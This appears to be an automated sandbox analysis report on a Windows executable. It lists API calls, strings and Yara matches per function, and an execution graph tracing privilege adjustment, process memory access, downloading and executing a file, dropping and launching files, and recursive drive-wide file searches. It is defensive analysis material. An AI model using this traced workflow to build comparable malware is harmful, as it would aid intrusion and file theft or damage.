                                                • API String ID: 4237864984-0
                                                APIs
                                                • LocalAlloc.KERNEL32(00000040,0000001C), ref: 0031393A
                                                • SetupDiEnumDeviceInfo.SETUPAPI(?,?,00000000), ref: 00313958
                                                • LocalAlloc.KERNEL32(00000040,0000001C), ref: 00313993
                                                • SetupDiEnumDeviceInterfaces.SETUPAPI(?,00000000,00363210,?,00000000), ref: 003139B8
                                                Yara matches
                                                Similarity
                                                • API ID: AllocDeviceEnumLocalSetup$InfoInterfaces
                                                • String ID:
                                                • API String ID: 1562706109-0
                                                APIs
                                                • _ValidateLocalCookies.LIBCMT ref: 0034AAE7
                                                • ___except_validate_context_record.LIBVCRUNTIME ref: 0034AAEF
                                                • _ValidateLocalCookies.LIBCMT ref: 0034AB78
                                                • __IsNonwritableInCurrentImage.LIBCMT ref: 0034ABA3
                                                • _ValidateLocalCookies.LIBCMT ref: 0034ABF8
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                • String ID: csm
                                                • API String ID: 1170836740-1018135373
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: api-ms-$ext-ms-
                                                • API String ID: 0-537541572
                                                APIs
                                                  • Part of subcall function 00358B12: _free.LIBCMT ref: 00358B37
                                                • _free.LIBCMT ref: 00358B98
                                                  • Part of subcall function 003543F6: RtlFreeHeap.NTDLL(00000000,00000000,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?), ref: 0035440C
                                                  • Part of subcall function 003543F6: GetLastError.KERNEL32(?,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?,?), ref: 0035441E
                                                • _free.LIBCMT ref: 00358BA3
                                                • _free.LIBCMT ref: 00358BAE
                                                • _free.LIBCMT ref: 00358C02
                                                • _free.LIBCMT ref: 00358C0D
                                                • _free.LIBCMT ref: 00358C18
                                                • _free.LIBCMT ref: 00358C23
                                                Yara matches
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                APIs
                                                • GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 00356212
                                                • __fassign.LIBCMT ref: 003563F7
                                                • __fassign.LIBCMT ref: 00356414
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0035645C
                                                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0035649C
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 00356544
                                                Yara matches
                                                Similarity
                                                • API ID: FileWrite__fassign$ConsoleErrorLastOutput
                                                • String ID:
                                                • API String ID: 1735259414-0
                                                APIs
                                                • GetLastError.KERNEL32(?,?,0034ADC7,0034A617,00349E5F), ref: 0034ADDE
                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0034ADEC
                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0034AE05
                                                • SetLastError.KERNEL32(00000000,0034ADC7,0034A617,00349E5F), ref: 0034AE57
                                                Yara matches
                                                Similarity
                                                • API ID: ErrorLastValue___vcrt_
                                                • String ID:
                                                • API String ID: 3852720340-0
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 00327BD9
                                                • _Allocate.LIBCONCRTD ref: 00327BE9
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: MM2$MM2$QP1
                                                • API String ID: 806954194-2220108417
                                                Strings
                                                • C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, xrefs: 0035763C
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                                • API String ID: 0-1535992457
                                                APIs
                                                • FreeLibrary.KERNEL32(00000000,?,?,?,0034BF38,?,?,0036EED4,00000000,?,0034C063,00000004,InitializeCriticalSectionEx,00363D6C,InitializeCriticalSectionEx,00000000), ref: 0034BF07
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: FreeLibrary
                                                • String ID: api-ms-
                                                • API String ID: 3664257935-2084034818
                                                APIs
                                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,0035266A,?,?,00352632,?,?,?), ref: 0035268A
                                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0035269D
                                                • FreeLibrary.KERNEL32(00000000,?,?,0035266A,?,?,00352632,?,?,?), ref: 003526C0
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: AddressFreeHandleLibraryModuleProc
                                                • String ID: CorExitProcess$mscoree.dll
                                                • API String ID: 4061214504-1276376045
                                                APIs
                                                • __alloca_probe_16.LIBCMT ref: 0035D448
                                                • __alloca_probe_16.LIBCMT ref: 0035D50E
                                                • __freea.LIBCMT ref: 0035D57A
                                                  • Part of subcall function 003548DF: RtlAllocateHeap.NTDLL(00000000,00000000,?,?,0034956E,00000000,?,00311FF9,00000000,?,00311F08), ref: 00354911
                                                • __freea.LIBCMT ref: 0035D583
                                                • __freea.LIBCMT ref: 0035D5A6
                                                Similarity
                                                • API ID: __freea$__alloca_probe_16$AllocateHeap
                                                • String ID:
                                                • API String ID: 1423051803-0
                                                APIs
                                                • RegisterServiceCtrlHandlerA.ADVAPI32(?,Function_000100B0), ref: 003201FC
                                                • SetServiceStatus.ADVAPI32(00000000,0036F574), ref: 0032022B
                                                • SetServiceStatus.ADVAPI32(00000000,0036F574), ref: 00320254
                                                • SetServiceStatus.ADVAPI32(00000000,0036F574), ref: 00320270
                                                • SetServiceStatus.ADVAPI32(00000000,0036F574), ref: 00320299
                                                Similarity
                                                • API ID: Service$Status$CtrlHandlerRegister
                                                • String ID:
                                                • API String ID: 1836899780-0
                                                APIs
                                                • _free.LIBCMT ref: 00358AC1
                                                  • Part of subcall function 003543F6: RtlFreeHeap.NTDLL(00000000,00000000,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?), ref: 0035440C
                                                  • Part of subcall function 003543F6: GetLastError.KERNEL32(?,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?,?), ref: 0035441E
                                                • _free.LIBCMT ref: 00358AD3
                                                • _free.LIBCMT ref: 00358AE5
                                                • _free.LIBCMT ref: 00358AF7
                                                • _free.LIBCMT ref: 00358B09
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 0032840D
                                                • _Allocate.LIBCONCRTD ref: 0032841F
                                                Strings
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: }h2$}h2
                                                • API String ID: 806954194-958364417
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 0033B29D
                                                • _Allocate.LIBCONCRTD ref: 0033B2AF
                                                Strings
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: W3$W3
                                                • API String ID: 806954194-1712538904
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 0033A8AD
                                                • _Allocate.LIBCONCRTD ref: 0033A8BF
                                                Strings
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: mN3$mN3
                                                • API String ID: 806954194-447428758
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 0033ABFD
                                                • _Allocate.LIBCONCRTD ref: 0033AC0F
                                                Strings
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: MQ3$MQ3
                                                • API String ID: 806954194-3531733306
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 0033AF4D
                                                • _Allocate.LIBCONCRTD ref: 0033AF5F
                                                Strings
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: -T3$-T3
                                                • API String ID: 806954194-1012538121
                                                APIs
                                                Strings
                                                Similarity
                                                • API ID: _free
                                                • String ID: *?
                                                • API String ID: 269201875-2564092906
                                                APIs
                                                  • Part of subcall function 003561CA: GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 00356212
                                                • WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,00354752,?,?,?,0036CF90,0000002C,003547C3,?), ref: 00356B7D
                                                • GetLastError.KERNEL32 ref: 00356B87
                                                • __dosmaperr.LIBCMT ref: 00356BC6
                                                Strings
                                                Similarity
                                                • API ID: ConsoleErrorFileLastOutputWrite__dosmaperr
                                                • String ID: RG5
                                                • API String ID: 910155933-2045918765
                                                APIs
                                                  • Part of subcall function 00312400: __aulldiv.LIBCMT ref: 00312482
                                                • SHGetFolderPathA.SHELL32(00000000,00000000), ref: 003135F6
                                                • __aulldiv.LIBCMT ref: 003136F6
                                                Strings
                                                Similarity
                                                • API ID: __aulldiv$FolderPath
                                                • String ID: @)$E)
                                                • API String ID: 3798299979-3004400368
                                                APIs
                                                  • Part of subcall function 003578E8: GetOEMCP.KERNEL32(00000000,00357B59,?,?,#5,00350D23,?), ref: 00357913
                                                • _free.LIBCMT ref: 00357BB6
                                                Similarity
                                                • API ID: _free
                                                • String ID: #5$`6
                                                • API String ID: 269201875-3890981038
                                                • Opcode ID: 3558cdc38fa7616e310d510380bd91f7e697d4cf142646daa540feaad83260be
                                                • Instruction ID: a5981e75846e1eea2985d7c85bec0fd77a49c4887b7bbbf6db4092a8a98ac1c9
                                                • Opcode Fuzzy Hash: 3558cdc38fa7616e310d510380bd91f7e697d4cf142646daa540feaad83260be
                                                • Instruction Fuzzy Hash: D131B071904209AFCB12EFA8E840E9E77B5FF44315F1141AAFD109B2B1EB329D59CB60
                                                Similarity
                                                • API ID: _strrchr
                                                • String ID:
                                                • API String ID: 3213747228-0
                                                • Opcode ID: c2b07f37c3ce205324c2a8086c1d99291ebed5f07273467f24d10bab3eeb6b9f
                                                • Instruction ID: 01568cfb07b2a2d29ce98b5c08ac75e267d630eba7da1055129f0f6a3c73603f
                                                • Opcode Fuzzy Hash: c2b07f37c3ce205324c2a8086c1d99291ebed5f07273467f24d10bab3eeb6b9f
                                                • Instruction Fuzzy Hash: B6B15831900A859FDB128F28C8A1FAEBBF5EF55312F254169EC45EF261D634AD09CB60
                                                Similarity
                                                • Opcode ID: e5249936d5fc0839d06c9a7641786ecd56a650a1b96760fecdadd962e7299ba6
                                                • Instruction ID: ce6ef900ae27d123d45e76ae555c63d27b65f8e1d202fa14dacc66c288237ada
                                                • Opcode Fuzzy Hash: e5249936d5fc0839d06c9a7641786ecd56a650a1b96760fecdadd962e7299ba6
                                                • Instruction Fuzzy Hash: BDC1CE74D092A88BDB62CF289C947EABBB1AF5A304F0482D9D88D6B251D7305EC5CF51
                                                Similarity
                                                • API ID: AdjustPointer
                                                • String ID:
                                                • API String ID: 1740715915-0
                                                • Opcode ID: b7091ecb9d8494a40df3d9d119c816f809b4eb41555b95cfa6ca960fa530d5df
                                                • Instruction ID: 1a8a223b11830c9a4141bc54c4a8b67f532b30a186ec1dc0c4bf4475bccd5155
                                                • Opcode Fuzzy Hash: b7091ecb9d8494a40df3d9d119c816f809b4eb41555b95cfa6ca960fa530d5df
                                                • Instruction Fuzzy Hash: AD51B1B2645A02AFDB279F54D841BAAB7E4EF04311F15402EE8118F691E731FD88DB92
                                                APIs
                                                • _free.LIBCMT ref: 0035D94E
                                                • _free.LIBCMT ref: 0035D977
                                                • SetEndOfFile.KERNEL32(00000000,00359DE8,00000000,?,?,?,?,?,?,?,?,00359DE8,?,00000000), ref: 0035D9A9
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,00359DE8,?,00000000,?,?,?,?,?), ref: 0035D9C5
                                                Similarity
                                                • API ID: _free$ErrorFileLast
                                                • String ID:
                                                • API String ID: 1547350101-0
                                                • Opcode ID: 01e0e000c5ca7eb26c0fb1f6fbf8cedc2ea0594ebd8c93924658ba404804a862
                                                • Instruction ID: 6a439c3731746b48af1de6172f3d0a0bdaffabf21f5cbc5e8714a892b75de393
                                                • Opcode Fuzzy Hash: 01e0e000c5ca7eb26c0fb1f6fbf8cedc2ea0594ebd8c93924658ba404804a862
                                                • Instruction Fuzzy Hash: 8B41C172900605AADB23ABA8CC02F9E3769EF45362F250510FC14EF2B1EB34D94C8761
                                                APIs
                                                  • Part of subcall function 00350AF1: _free.LIBCMT ref: 00350AFF
                                                  • Part of subcall function 00357FC8: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,0035D570,?,00000000,00000000), ref: 00358074
                                                • GetLastError.KERNEL32 ref: 0035700B
                                                • __dosmaperr.LIBCMT ref: 00357012
                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 00357051
                                                • __dosmaperr.LIBCMT ref: 00357058
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                • String ID:
                                                • API String ID: 167067550-0
                                                • Opcode ID: c63b405d6cd698a9abe5f441b7264acc718f725c5c89cae8eb774c7dd144ae32
                                                • Instruction ID: ed3b0161dcbd786a60ce03c6e6ddb03323e3aa8c31cfe54037dad0f6186b5a14
                                                • Opcode Fuzzy Hash: c63b405d6cd698a9abe5f441b7264acc718f725c5c89cae8eb774c7dd144ae32
                                                • Instruction Fuzzy Hash: B821B371A08215AFDB32AF65AC81C2BB7ACFF013667518618FC159B6A1D771ED0887A0
                                                APIs
                                                • GetLastError.KERNEL32(?,?,?,0034D9A7,?,?,?,?,00350D23,?), ref: 00353AA0
                                                • _free.LIBCMT ref: 00353AFD
                                                • _free.LIBCMT ref: 00353B33
                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,0034D9A7,?,?,?,?,00350D23,?), ref: 00353B3E
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 8edfcb9f12149c63bc6a6ba0ae7ee304a73c3c12dc9476c6e8da2b9233575870
                                                • Instruction ID: a289510b5e6bc828d3a3575d06268db2c79e487243bd7580d17a2a2255e18f6b
                                                • Opcode Fuzzy Hash: 8edfcb9f12149c63bc6a6ba0ae7ee304a73c3c12dc9476c6e8da2b9233575870
                                                • Instruction Fuzzy Hash: 07112C362082457AC61766799C86E2B215EABC13FFB254638FD218B1F1FEA18D0D4111
                                                APIs
                                                • GetLastError.KERNEL32(?,00000000,?,00350CBD,00354922,?,?,0034956E,00000000,?,00311FF9,00000000,?,00311F08), ref: 00353BF7
                                                • _free.LIBCMT ref: 00353C54
                                                • _free.LIBCMT ref: 00353C8A
                                                • SetLastError.KERNEL32(00000000,00000006,000000FF,?,00000000,?,00350CBD,00354922,?,?,0034956E,00000000,?,00311FF9,00000000), ref: 00353C95
                                                Similarity
                                                • API ID: ErrorLast_free
                                                • String ID:
                                                • API String ID: 2283115069-0
                                                • Opcode ID: 9955758afc1369dee075e7f6f5141ec75e3f23888553c3ba9ee71085482232de
                                                • Instruction ID: 5c8be24bd4030d01fa06d6d4b6baf22541d4bbf17b20691bc038ed516d1e86aa
                                                • Opcode Fuzzy Hash: 9955758afc1369dee075e7f6f5141ec75e3f23888553c3ba9ee71085482232de
                                                • Instruction Fuzzy Hash: 4B1129362042407AC61362759C86E2B226EABC13BFF254538FD25AB1F1EEA18D4D4111
                                                APIs
                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,0035C42F,?,00000001,?,00000001,?,003565A1,?,?,00000001), ref: 0035DEE9
                                                • GetLastError.KERNEL32(?,0035C42F,?,00000001,?,00000001,?,003565A1,?,?,00000001,?,00000001,?,00356AED,RG5), ref: 0035DEF5
                                                  • Part of subcall function 0035DEBB: CloseHandle.KERNEL32(FFFFFFFE,0035DF05,?,0035C42F,?,00000001,?,00000001,?,003565A1,?,?,00000001,?,00000001), ref: 0035DECB
                                                • ___initconout.LIBCMT ref: 0035DF05
                                                  • Part of subcall function 0035DE7D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0035DEAC,0035C41C,00000001,?,003565A1,?,?,00000001,?), ref: 0035DE90
                                                • WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,0035C42F,?,00000001,?,00000001,?,003565A1,?,?,00000001,?), ref: 0035DF1A
                                                Similarity
                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                • String ID:
                                                • API String ID: 2744216297-0
                                                • Opcode ID: daf504d6ff55d788b763fa43e7e294131883576de40b8efc9cdd5075684359c0
                                                • Instruction ID: 25458cda95ce238b4d80daf49cd3c952af0e4e91e5cb778e8a707a6d28d30295
                                                • Opcode Fuzzy Hash: daf504d6ff55d788b763fa43e7e294131883576de40b8efc9cdd5075684359c0
                                                • Instruction Fuzzy Hash: 55F0C036541224BBCF332F99DC05D9E7F6AFB097A2F058414FE1A9A130D6728934DB90
                                                APIs
                                                • _free.LIBCMT ref: 00353019
                                                  • Part of subcall function 003543F6: RtlFreeHeap.NTDLL(00000000,00000000,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?), ref: 0035440C
                                                  • Part of subcall function 003543F6: GetLastError.KERNEL32(?,?,00358B3C,?,00000000,?,?,?,00358B63,?,00000007,?,?,00358F65,?,?), ref: 0035441E
                                                • _free.LIBCMT ref: 0035302C
                                                • _free.LIBCMT ref: 0035303D
                                                • _free.LIBCMT ref: 0035304E
                                                Similarity
                                                • API ID: _free$ErrorFreeHeapLast
                                                • String ID:
                                                • API String ID: 776569668-0
                                                • Opcode ID: a8946b72ad421da6b51e11be9c67fd5e1bc618e99b75d63da0049056c60dee93
                                                • Instruction ID: 4c08a7605281c8143f101cc8455805f494d5770b4e93c04653425c44da5b86f5
                                                • Opcode Fuzzy Hash: a8946b72ad421da6b51e11be9c67fd5e1bc618e99b75d63da0049056c60dee93
                                                • Instruction Fuzzy Hash: A3E0BF76811220EFC617AF18FD018463A69F746785B019136F90557231EBF609679B81
                                                APIs
                                                • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000,8CDA9266), ref: 00320436
                                                • CreateDirectoryA.KERNEL32(?,00000000,?,?,?,?), ref: 0032070F
                                                Similarity
                                                • API ID: CreateDirectoryFolderPathSpecial
                                                • String ID: bm
                                                • API String ID: 2904043388-599385607
                                                • Opcode ID: c5e8f28931cf4d1c283df74b4d7a15e5b727ef6b460ffdf26c1e47c63e6dd10c
                                                • Instruction ID: 1b882c4f10234b58cdfd3118b0cac3e5816c074566cea7c1daa9458516a67652
                                                • Opcode Fuzzy Hash: c5e8f28931cf4d1c283df74b4d7a15e5b727ef6b460ffdf26c1e47c63e6dd10c
                                                • Instruction Fuzzy Hash: 7702DD749092A88BDB66CF28DD85BDABBB0AF59300F1082D9D94D67251EB316FC5CF40
                                                Similarity
                                                • API ID: __aulldvrm
                                                • String ID: +$-
                                                • API String ID: 1302938615-2137968064
                                                • Opcode ID: 5ab2d7c5e4061503a115a80006edc564ab3dd35c5641275d1df21426edd52395
                                                • Instruction ID: 4dfb2d80d3f0a0a82dee76e4e03d15f1cdfbcb0c331fbb28f5253edcd82e56b8
                                                • Opcode Fuzzy Hash: 5ab2d7c5e4061503a115a80006edc564ab3dd35c5641275d1df21426edd52395
                                                • Instruction Fuzzy Hash: FC91D430D002499EDF2ACF68C450EEDBBB5EF15322F158256EC71AB2B1D33299498F91
                                                APIs
                                                  • Part of subcall function 003578E8: GetOEMCP.KERNEL32(00000000,00357B59,?,?,#5,00350D23,?), ref: 00357913
                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,#5,00357BA0,?,00000000,?,?,?,?,?,?,00350D23), ref: 00357DAB
                                                • GetCPInfo.KERNEL32(00000000,00357BA0,?,#5,00357BA0,?,00000000,?,?,?,?,?,?,00350D23,?), ref: 00357DED
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: CodeInfoPageValid
                                                • String ID: #5
                                                • API String ID: 546120528-643275717
                                                • Opcode ID: 9d160383ffe5fd2a9e82fe92cc8f4d560faabd4d620fa691245c52e02d82c2b3
                                                • Instruction ID: 6f42aabae9bc063566fb2c510228ae61a1cee409fa1c5601675ad85b95e8ebc8
                                                • Opcode Fuzzy Hash: 9d160383ffe5fd2a9e82fe92cc8f4d560faabd4d620fa691245c52e02d82c2b3
                                                • Instruction Fuzzy Hash: 29513770A083419EDB238F75E846EBBBBF9EF51301F1544AED8868B171D374994ACB90
                                                Strings
                                                • C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe, xrefs: 0035278A, 00352791, 003527C7
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: C:\Users\user\Desktop\611479C78035C912DD69E3CFDADBF74649BB1FCE6241B7573CFB0C7A2FC2FB2F.exe
                                                • API String ID: 0-1535992457
                                                • Opcode ID: fb71c3e13894944171f2f164e2a6f5bee1054a915e605f8639227fbb32668403
                                                • Instruction ID: d0456df0a1781e3fd07b7e11c25d69c1ede0cdab893e00f922a5066b475ab6e5
                                                • Opcode Fuzzy Hash: fb71c3e13894944171f2f164e2a6f5bee1054a915e605f8639227fbb32668403
                                                • Instruction Fuzzy Hash: 10416071A00214AFCB27DF999C81D9FBBA8EB9A311F144066ED05DB221E7719E49CB90
                                                APIs
                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0034B4E2
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: EncodePointer
                                                • String ID: MOC$RCC
                                                • API String ID: 2118026453-2084237596
                                                • Opcode ID: 0ee248c0cb2eda5c229afa95536b12b44088d1c0097e99c1b334b64d8187dd6f
                                                • Instruction ID: b7d132283cf7592c189ea9f7d6c30af2ffa3a6434c2540b94a656475cccd6f5c
                                                • Opcode Fuzzy Hash: 0ee248c0cb2eda5c229afa95536b12b44088d1c0097e99c1b334b64d8187dd6f
                                                • Instruction Fuzzy Hash: AD413571900209AFCF16DF98C881AAEBBF5FF49304F198199F904AA261D335EE50DB51
                                                APIs
                                                • Concurrency::cancel_current_task.LIBCPMTD ref: 00339B2E
                                                • _Allocate.LIBCONCRTD ref: 00339B42
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateConcurrency::cancel_current_task
                                                • String ID: 863
                                                • API String ID: 806954194-3824524633
                                                • Opcode ID: 64e35e075492f13ee1684285b83e23fba8a1a55d921d896b448104365721c70b
                                                • Instruction ID: cb1b25922d74a3f46533ad6c1f62a2542b8fe4fd8fa44a1accb9610b3f8a397f
                                                • Opcode Fuzzy Hash: 64e35e075492f13ee1684285b83e23fba8a1a55d921d896b448104365721c70b
                                                • Instruction Fuzzy Hash: 85418FB5D052089FCB05DFA9D481ADEBBF5FB48310F10822AE815AB394D774A945CF94
                                                APIs
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: _free
                                                • String ID: (6
                                                • API String ID: 269201875-3915136759
                                                • Opcode ID: 0c2f118e5bf29065b21aa06590513d540127bfed78110a0adde84c47a4160c1e
                                                • Instruction ID: b9765bb4dc34f7fa8790d9d079e76462dcc32f7c0eb2b7c3b06c0304d697d385
                                                • Opcode Fuzzy Hash: 0c2f118e5bf29065b21aa06590513d540127bfed78110a0adde84c47a4160c1e
                                                • Instruction Fuzzy Hash: 9311E672A043009FD7229B28BC41F5533F9A701775F154636FD20CB1F1D3B0D94A8A41
                                                APIs
                                                • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0034938C
                                                • ___raise_securityfailure.LIBCMT ref: 00349473
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: FeaturePresentProcessor___raise_securityfailure
                                                • String ID: H6
                                                • API String ID: 3761405300-1886276026
                                                • Opcode ID: a7236794d61280221f0e7649c1f16176bbc9656232de5e99110684dfe2b7c491
                                                • Instruction ID: 5e8aaf82fa2a7d80e831d4ec923f81a08491ab52442bcc52fda77303123a2c60
                                                • Opcode Fuzzy Hash: a7236794d61280221f0e7649c1f16176bbc9656232de5e99110684dfe2b7c491
                                                • Instruction Fuzzy Hash: 4221C2BD510204DAE717CF19E986B447BE8BB08314F14C42AE90A8B2B0EBF0688DCF55
                                                APIs
                                                • GetFileAttributesA.KERNEL32(00000001), ref: 003131F0
                                                • GetLastError.KERNEL32 ref: 003131FF
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID: AttributesErrorFileLast
                                                • String ID: $
                                                • API String ID: 1799206407-3993045852
                                                • Opcode ID: 1ff553679473319bf00e73147e12cb811880c602c7c82da3cf367486e38e5db4
                                                • Instruction ID: 244401a5f92a7fa171c89b40442ddc40d413fc6c39852d4e643d00b231412cbc
                                                • Opcode Fuzzy Hash: 1ff553679473319bf00e73147e12cb811880c602c7c82da3cf367486e38e5db4
                                                • Instruction Fuzzy Hash: 2911E574C0820DEBCF2AEFA4E8481EDBB74AB0E315F1199A9D81267240D2355BC6DF91
                                                APIs
                                                • GetOEMCP.KERNEL32(00000000,00357B59,?,?,#5,00350D23,?), ref: 00357913
                                                • GetACP.KERNEL32(00000000,00357B59,?,?,#5,00350D23,?), ref: 0035792A
                                                Strings
                                                Yara matches
                                                Similarity
                                                • API ID:
                                                • String ID: #5
                                                • API String ID: 0-643275717
                                                • Opcode ID: 2520d96abb974920db6b1e849c440923f20602f3b7657c64b35b81de7b930f4a
                                                • Instruction ID: c84ea5e3bb711c5047b93ce6f194a1c918648027568913f49b09ac5d28ff8157
                                                • Opcode Fuzzy Hash: 2520d96abb974920db6b1e849c440923f20602f3b7657c64b35b81de7b930f4a
                                                • Instruction Fuzzy Hash: ADF06D304042048FDB12DF68E858BA877B9BB4233AF644345E966CA5F1D7B19E49CB54

                                                Execution Graph

                                                Execution Coverage:31.2%
                                                Dynamic/Decrypted Code Coverage:5%
                                                Signature Coverage:15.4%
                                                Total number of Nodes:279
                                                Total number of Limit Nodes:9
                                                execution_graph (rendered as a per-function node list: the first address is the function the graph nodes belong to, the addresses that follow are the graph's own node addresses with the API labels it attaches to them, and "->" gives the recorded call or branch targets)

                                                6114e1 (entry point): 6114fd GetModuleHandleA; 61151a VirtualQuery; 611579 ExitProcess. -> 611638 (via 611573); -> 611af9 (via 611549)
                                                611638: GetTempPathA GetSystemDirectoryA GetModuleFileNameA; 6116a0 CreateThread (thread starts 612c48 and 611099); 6116ba WaitForSingleObject, then 611718 again (3 API calls); 6116dd lstrcpy. -> 61139f (via 61167a); -> 611718 (via 61167f); -> 611581 (via 6116d0)
                                                611718: GetSystemTimeAsFileTime; 611735 SHSetValueA; 61175a SHGetValueA; 611786 __aulldiv
                                                61139f: GetVersionExA; 6113cf LookupPrivilegeValueA; 611448 GetCurrentProcessId. -> 61119f (via 6113e7); -> 61120e (via 6113ef); -> 611319 five times (from 611457, 61147f, 61148e, 6114b4, 6114c3)
                                                61119f: GetCurrentProcess OpenProcessToken; 6111c6 AdjustTokenPrivileges; 6111f7 and 611200 CloseHandle
                                                61120e: GetModuleHandleA GetProcAddress; 61123f GetCurrentProcessId OpenProcess; 6112b0 VirtualAlloc; 611296 and 611302 VirtualFree; 6112f1 CloseHandle. -> 611319 (via 611310)
                                                611319: 61132a GetModuleHandleA GetProcAddress; 611351 memset
                                                611581: -> 61185b; 611592 wsprintfA wsprintfA lstrlen CreateFileA; 6115fb WriteFile CloseHandle; 61161d ShellExecuteA; returns to 61170f
                                                61185b (called from 611581, 6119d5, 611c94, 611b93, 61226e, 61274a and 6110ba): GetSystemTimeAsFileTime srand rand srand rand
                                                611af9: 611b16 CreateThread (thread start 611638, 189 API calls); 611b09 -> 611638 (188 API calls)
                                                611099 (thread started at 6116a0): 6110ba -> 61185b; 611118 wsprintfA wsprintfA URLDownloadToFileA; 611168 lstrlen Sleep. -> 611000 (via 6110dc)
                                                611000: CreateFileA; 611025 GetFileSize CreateFileMappingA MapViewOfFile; 611074 UnmapViewOfFile; 611087 and 61108d CloseHandle; 611092 WinExec lstrlen
                                                612c48 (thread started at 6116a0): memset; -> 611973; 612c8f CreateThread WaitForMultipleObjects; -> 612b8c; 612cbb VirtualFree; then 6116ba WaitForSingleObject
                                                611973: PathFileExistsA; 6119af CreateFileA; 6119c4 Sleep; 6119d5 -> 61185b; 6119da wsprintfA CopyFileA; 611a0d CreateFileA; 611a28 GetFileSize; 611a3d VirtualAlloc; 611a59 ReadFile; 611a8d FindCloseChangeNotification; 611a9c DeleteFileA; 611ab8 VirtualFree
                                                612b8c: memset GetLogicalDriveStringsA; 612bd2 GetDriveTypeA; 612be3 CreateThread (thread start 612b7d, one per drive); 612bfa lstrlen; 612c09 WaitForMultipleObjects; 612c2a CreateThread (thread start 612845)
                                                612b7d -> 6129e2: memset wsprintfA; 612a3a memset lstrlen lstrcpyn strrchr; 612a9a lstrcmpiA; 612aad lstrlen; 612abc memset memset FindFirstFileA; 612b35 lstrcmpiA; 612b61 FindNextFileA; 612b6d FindClose. -> 6128b8 for each directory entry (from 612abc and 612b23)
                                                6128b8: memset wsprintfA; 61291b memset wsprintfA -> 6129e2 (recursion into subdirectories, 180 API calls); 612951 memset; 612956 strrchr; 612967 lstrcmpiA; 612988 lstrcmpiA; 6129a5 lstrcpy; 6129ad strstr. -> 611e6e (via 61297a); -> 612692 (via 6129d3); -> 61239d (via 6129cb)
